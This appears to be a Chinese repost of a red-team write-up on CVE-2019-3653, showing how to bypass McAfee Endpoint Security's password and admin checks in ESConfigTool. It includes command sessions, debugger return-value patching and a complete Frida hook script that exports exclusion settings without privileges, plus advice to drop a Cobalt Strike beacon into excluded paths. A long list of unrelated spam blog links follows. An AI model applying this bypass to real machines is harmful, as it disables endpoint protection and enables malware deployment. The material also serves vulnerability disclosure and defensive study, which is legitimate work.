怎样卸载迈克菲,如何禁用mcafee杀毒软件

利用Mcafee管理工具绕过McAfee杀毒软件

介绍这篇文章是关于我在一次红队活动中如何利用McAfee工具绕过McAfee Endpoint Security杀毒软件的故事。本来我没有计划写这篇文章,但当时的队友@fsdominguezand和@_dirkjan觉得此事值得被记录下来。现在,就让我们开始吧。McAfee在以往,每当我们遇到McAfee Virus Scan Enterprise(VSE)的时候,都可以通过简单地查询注册表,了解到那些位置是管理员指定的“特殊位置”(不受杀毒软件影响)。

然而,在这次任务中,事情没那么简单。因为他们使用的是McAfee Endpoint Security,从VSE时代到现在,McAfee可能认为最好不要将“特殊位置”之类的信息以明文形式存储在任何人都可阅读的文件中。

那么,我们现在该把恶意文件放在哪里?ESConfigToolMcAfee Endpoint Security杀毒软件附带一个名为ESConfigTool的程序,可用于导入和导出配置文件。它的详细用法如下。

我们发现,要从McAfee Endpoint Security得知安全设置,你需要:解锁密码管理权限很遗憾这两者我们都没有。

现在,先让我们下载一个试用版本的McAfee Endpoint Security,看看是否有入手点。

变化我们最后决定还是以ESConfigTool为目标,看看它是否有漏洞。我先创建了三个“特殊位置”:C:\Windows\Temp\*mimikatz.exeC:\TotallyLegit\

还设置了密码保护:starwars。

打开一个cmd,看看我们是否可以得到这些设置信息。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock starwars /plaintextCommand executed successfully. Please refer to Endpoint Security logs for detailsC:\Windows\system32>让我们打开xml文件,看看是否有敏感信息:

C:\Windows\Temp\031110**\*mimikatz.exe030110C:\TotallyLegit\031110是的,在拥有管理员权限以及输入了正确密码的情况下,你可以得到安全设置。让我们通过x64dbg软件,看一下它的整体流程。Self-defense通常使用调试软件打开二进制文件是很简单的,但由于我们面对的是安全软件,所以有一些额外的障碍。一个重要的原因是,McAfee的大部分组件都有“自卫”功能。如果你尝试使用调试软件,将立即得到一个Debugging stopped消息,McAfee对这种可疑行为极为敏感。

 

12/10/2019 12:47:09 mfeesp(2204.6392) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.12/10/2019 12:47:09 mfeesp(2204.5404) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.看来我们首先需要绕过这种自我防御机制。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>mkdir \tempC:\Users\admin>cd \tempC:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\blframework.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\EpSecApiLib.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\McVariantExport.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\LogLib.dll” . 1 file(s) copied.C:\temp>没错,只要像如上所述疯狂复制文件,你就可以绕过自我防御,对软件进行调试。现在,让我们开始调试吧

绕过密码检查先让我们看看当使用错误的密码时会发生什么,也许会有一些字符提示:

C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock startrek /plaintextThere were some errors while executing command. Please refer to Endpoint Security logs for detailsC:\Windows\system32>嗯,没什么特别的。不过McAfee的日志文件提供了更多信息:

10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password, TriggerAction failed让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。

 

现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:

 

此时,我们有两个选择:进入密码检查函数,看看它是如何工作的,并尝试破解密码。直接更改检查函数的返回值。因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:

如果提供了正确的密码,则RAX寄存器的值为0

那么,如果我们提供了错误的密码,将密码检查函数中断,并将RAX寄存器的值改为0,会发生什么情况呢?

成功导出设置!

看来密码检查只是由工具本身完成的,不牵涉其他组件,也不需要解密。绕过管理员权限在没有管理员权限的情况下,ESConfigTool工具能使用的功能是非常有限的:

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\user>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\temp\Export.xml /module TP /unlock starwars /plaintextDescription: Endpoint security configuration tool for exporting and importing policy configuration. User needs administrator privileges to run this utility. Utility needs password if the client interface is password protected. File supplied for import must be an encrypted file.USAGE: ESConfigTool.exe /export [/module <TP|FW|WC|ESP> ] [/unlock ] [/plaintext ] ESConfigTool.exe /import [/module <TP|FW|WC|ESP> ] [/unlock ] [/policyname ] ESConfigTool.exe /helpC:\Users\user>我们怎样才能知道权限检查的流程呢?先让我们以普通用户的身份运行调试器,看看会发生什么。发现它调用一个函数,并对返回值进行字符串比较,如果返回代码不是0,则调用“exit”。

如果追踪这个函数,会发现它将最终调用AllocateAndInitializeSid。不过这些都不值得花时间去逆向。让我们再次尝试偷懒的方法更改函数返回值。

返回值检查如下:

这一次返回值必须是0以外的任何值。

OK,又成功了!

我们现在可以从McAfee Endpoint Security导出安全设置,不需要管理权限,不需要知道正确的密码!自动运行到目前为止,一切都很顺利,但是每次使用调试器更改返回值是一件痛苦的事情。不过幸运的是,存在Frida这么一个有趣的东西,它可以帮你做所有很酷的事情,比如hook函数或改变其返回值,你不需要任何额外的技能,除了javascript!

那么我们如何将Frida注入到McAfee呢?很简单,frida-server。只需在运行McAfee的机器上启动它,然后使用Python进行连接。McAfee机器:Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>cd \tempC:\temp>frida-server-12.7.9-windows-x86_64.exePython机器:Python 3.6.7 (default, Oct 22 2018, 11:32:17) [GCC 8.2.0] on linuxType “help”, “copyright”, “credits” or “license” for more information.>>> import frida>>> devmgr = frida.get_device_manager()>>> devmgr.add_remote_device(‘192.168.31.150′)Device(id=”tcp@192.168.31.150″, name=”192.168.31.150″, type=’remote’)>>> rdev = frida.get_device(‘tcp@192.168.31.150’)>>> args = [… ‘ESConfigTool.exe’,… ‘/export’,… ‘frida-export.xml’,… ‘/module’,… ‘ESP’,… ‘/unlock’,… ‘startrek’,… ‘/plaintext’… ]>>> pid = rdev.spawn(args)>>> session = rdev.attach(pid)>>> sessionSession(pid=11168)现在我们已经连接上,ESConfigTool.exe也正在运行!

现在我们可以将JS代码注入到ESConfigTool进程中。Frida脚本我不会详细介绍这个脚本的功能,其完整代码如下:

const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);//const adminCheck = configbase.add(0x5240); //32const adminCheck = configbase.add(0x5f30); //64const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)console.log(‘[-] base address is:’,configbase);console.log(‘[-] Admin check is:’,adminCheck);console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);Interceptor.attach(adminCheck, { onEnter: function (args) { console.log(‘[+] Hooked admin check function’); }, onLeave: function (retval) { console.log(‘[+] Returning true for admin check’); retval.replace(1); }});Interceptor.attach(BLInvokeMethod, { onEnter: function (args) { console.log(‘[+] Hooked BLInvokeMethod function’); }, onLeave: function (retval) { console.log(‘[+] Patching password check function’); retval.replace(0x0); }});这个脚本执行的正是我们在调试器中手动执行的操作,更改返回值。让我们注入脚本,看看它是否有效:

>>> script = “””… const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);… //const adminCheck = configbase.add(0x5240); //32… const adminCheck = configbase.add(0x5f30); //64… const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)… … console.log(‘[-] base address is:’,configbase);… console.log(‘[-] Admin check is:’,adminCheck);… console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);… … Interceptor.attach(adminCheck, {… onEnter: function (args) {… console.log(‘[+] Hooked admin check function’);… },… onLeave: function (retval) {… console.log(‘[+] Returning true for admin check’);… retval.replace(1);… }… });… … Interceptor.attach(BLInvokeMethod, {… onEnter: function (args) {… console.log(‘[+] Hooked BLInvokeMethod function’);… },… onLeave: function (retval) {… console.log(‘[+] Patching password check function’);… retval.replace(0x0);… }… });… … “””>>> session.create_script(script).load()[-] base address is: 0x7ff73ed30000[-] Admin check is: 0x7ff73ed35f30[-] BLInvokeMethod: 0x7ffa4d759730>>> rdev.resume(pid)>>> [+] Hooked admin check function[+] Returning true for admin check[+] Hooked BLInvokeMethod function[+] Patching password check function>>>最终结果如下:

虽然我是作为“admin”用户运行的,但是没有涉及UAC。相信我,这套方法也适用于普通用户。后续现在,我们就可以把一个Cobalt Strike beacon放入那些“特殊位置”。尽管在本文中只讨论了设置信息导出,但你也可以导入配置文件,添加“特殊位置”,更改其他设置,甚至完全删除密码。

值得一提的是,其实这个配置文件加密与否并不重要,因为你可以把它导入自己的McAfee软件进行查看。

McAfee在确认了漏洞后,发布了一个安全建议和相关的修复程序,漏洞被标记为CVE-2019-3653。

如果你想了解更多,可以在这里找到PoC脚本。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:https://dmaasland.github.io/posts/mcafee.html

原文:https://www.loosebyte.com/google-cloud-vulnerability/

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326069.html

(0)

相关推荐

  • 拼多多三只松鼠,拼多多三只松鼠是正品吗

    《拼多多三只松鼠:电商界的独特存在》 在如今竞争激烈的电商市场中,拼多多三只松鼠无疑是一个备受关注的存在。 它仿佛是电商领域的一颗璀璨明星,吸引着众多消费者的目光。 那么,拼多多三只松鼠到底有何独特之处呢?让我们一起来深入探究。 一、品牌定位与特色 三只松鼠,这个名字一听就给人一种可爱、亲切的感觉。 它仿佛是一个在森林中穿梭的小精灵,带着满满的活力和趣味。 …

    2025-02-23
  • 姚明年薪多少(姚明年薪最高是多少)

    姚明年薪多少(姚明年薪最高是多少)姚明年薪多少(姚明年薪最高是多少)姚明年薪多少(姚明年薪最高是多少)姚明年薪多少(姚明年薪最高是多少)

    姚明拥有非常成功的职业生涯,在2002年的选秀大会上,他以状元秀的身份被选中。初入联盟时,一度也是饱受质疑,首秀得分挂零,不适应NBA强度,就连巴克利都说他是一个水货。不过此后姚明迅速成长,第二年就成为了最佳阵容的一员。虽然NBA生涯只有短短的8年,但姚明已经证明了自己,最终也入选了篮球名人堂。 纵观大姚的NBA生涯,8个赛季都在火箭队度过,表现非常的出色。…

    2022-01-21 投稿
  • 冒险酒馆攻略 一步一步带你攻克冒险酒馆

    冒险酒馆攻略完美通关玩家心得分享,我们在游戏中想要能够顺利的通关,我们需要注意的地方还是非常的多的,玩家只有掌握好这些细节方面,我们才能够更加顺利的通关每一个关卡的考验,那么在游戏中我们怎么样才能够顺利的完美通关呢,下面就给玩家详细的说一说,一起来看看吧。 完美通关玩家心得分享: 1、升级我们的英雄,我们在游戏中不同的人物角色有着不同的能力,我们要做的就是升…

    2023-05-23
  • 几个方法帮你破抖音播放量,提高播放量

    今天一早和小伙伴们去拜访苏州一家专业做抖音运营公司,去取经。术业有专攻,快速进入一个行业的最好方式是就拜师。 拜访的这家在本地算是小有名气,驱车30分钟到达公司,也把今天的学习内容给大家分享:手把手教你如果破播放量 01 抖音播放量原理 我们发布一条新的视频,特别是新手新号的抖音,很难突破500或者1000的播放量。抖音会在2个小时左右把你新发布的视频推送给…

    2022-04-30
  • 大王卡免流量听书(大王卡免流量应用列表)

    大王卡免流量听书(大王卡免流量应用列表)大王卡免流量听书(大王卡免流量应用列表)大王卡免流量听书(大王卡免流量应用列表)大王卡免流量听书(大王卡免流量应用列表)

    在陈云纪念馆的展厅里,放着两辆红旗车,在这两辆车子的背后,有一段鲜为人知的故事…… 上周,在嘉昆太党史学习教育 联学联动启动仪式上 黄震良作为上海嘉定区宣讲员代表 和江苏昆山、太仓两地的宣讲员 联合带来首场故事宣讲《两辆红旗车》 结合三地方言的特色演绎 短短6分钟的故事 让现场观众忍不住连连叫好 嘉昆太宣讲员联合带来故事宣讲《两辆红旗车》 黄震良是这场故事宣…

    2023-05-25 投稿
  • 蒋欣婚纱照(蒋欣婚纱照老公是谁)

    蒋欣婚纱照(蒋欣婚纱照老公是谁)蒋欣婚纱照(蒋欣婚纱照老公是谁)蒋欣婚纱照(蒋欣婚纱照老公是谁)蒋欣婚纱照(蒋欣婚纱照老公是谁)

    华妃娘娘要结婚?! 到底是哪位高人收服了娘娘 仔细一看 这个不是《情深深雨蒙蒙》里的尓豪么 所以说尓豪和娘娘在一起了? 瞬间我凌乱了 画面实在脑补不出来 还好i妹儿是一个喜欢求真理的人 所以帮你们查了一下 原来这是《老爸当家》的剧照 现如今剧照都能以假乱真了 当真以为他们俩在一起了呢 这一对情侣组合勾起了i妹儿对《老爸当家》兴趣 听说《老爸当家》中张国立成了…

    2022-01-20 投稿
  • 丹红注射液,红花注射被列入禁用原因

    丹红注射液为步长制药贡献过半利润,现面临停用风险;中药注射剂一致性评价深入推进,市场生变 因被多个省份地区纳入辅助与重点监控用药目录,步长制药的拳头产品丹红注射液再次引发关注。作为步长制药的绝对主力产品,丹红注射液2016年为公司贡献超三成营收、过半净利润。顶着“最贵新股”光环的步长制药目前已经跌破发行价,相较于高峰时的1060亿元,市值蒸发超过700亿。如…

    2023-06-28
  • 长沙网络营销推广,长沙网站营销推广

    《长沙网络营销推广:全面解析与实操指南》 一、网络营销推广的重要性我觉得在当今数字化时代,网络营销推广对于长沙的企业和品牌来说,好像是至关重要的。它就像是一把打开市场大门的钥匙,能让更多的人了解到长沙的特色产品和服务。就好比你在一个热闹的集市上,通过大声吆喝和展示你的商品,吸引更多的顾客前来购买。在网络这个庞大的集市中,网络营销推广就是你的吆喝声和展示方式,…

    2025-08-19
  • 狂龙战士技能加点(冒险岛手游狂龙战士技能加点)

    狂龙战士输出是非常强力的,那么大家是否知道什么加点是最适合狂龙战士的呢?豆豆下面为大家带来的就是冒险岛手游狂龙战士加点技巧,大家可千万不要错过了。 冒险岛手游狂龙战士技能加点: 一转 二转 三转 四转 以上就是冒险岛手游狂龙战士技能加点,冒险岛手游狂龙战士加点技巧的全部内容了,希望可以帮助到各位玩家朋友,想要获取更多职业加点攻略的朋友,就请多多关注97973…

    2022-01-21
  • 网上最靠谱的赚钱方法(网上怎么挣钱最安全可靠)

    现在由于疫情不好,就业压力过大,其实老百姓手里没啥钱,你就像我之前说的一个普通家庭存款还有50万的有多少人,答案是90%的人达不到,这里指的是不算你固定资产比如房子、车子等。   而且在家待业的或者宝妈等占有率很多,不是一个小数目,所以大家都想挣点钱增加一下家里收入,于是呢整天在家呆着无所事事没事就刷刷手机,感觉时间浪费了,钱也没赚到,现在钱还毛,…

    2022-01-21
  • 一键铺货软件哪个好用(淘宝有没有一键铺货的软件)

    一键铺货软件哪个好用(淘宝有没有一键铺货的软件)一键铺货软件哪个好用(淘宝有没有一键铺货的软件)一键铺货软件哪个好用(淘宝有没有一键铺货的软件)一键铺货软件哪个好用(淘宝有没有一键铺货的软件)

    coupang是韩国综合性的电商平台,其中涵盖了包括生鲜在内的数以万计的产品,全国范围内能在几个小时内送货上门的全年极速配送服务,有韩国亚马逊之称。今年三月份在**上市,成为继阿里之后规模最大的一次亚洲规模上市。截止2020.12.31日coupang活跃用户为1603万,消费者粘性高。   对于新卖家而言,商品上架是在Coupang上开展销售的第…

    2021-12-05 投稿
  • 自助建站系统哪个好,自助建网站平台哪个好

    自助建站系统哪个好,自助建网站平台哪个好自助建站系统哪个好,自助建网站平台哪个好自助建站系统哪个好,自助建网站平台哪个好自助建站系统哪个好,自助建网站平台哪个好

    前言 忘记是哪个国外公司老总说过的了,说了这样一句话“no software”并且这句话挂着公司墙上,这句话主要来自于“no smoking”的变形,不过传达的意思是未来没有软件之说,软件无处不在,这就是SAAS的来源。 现在这个公司非常牛,一时间忘记了,哪个小伙伴知道可以在下方评论留言。 聊回到网站建设 特别是企业网站建设,公司首页,公司新闻,公司产品,公…

    2022-03-12 投稿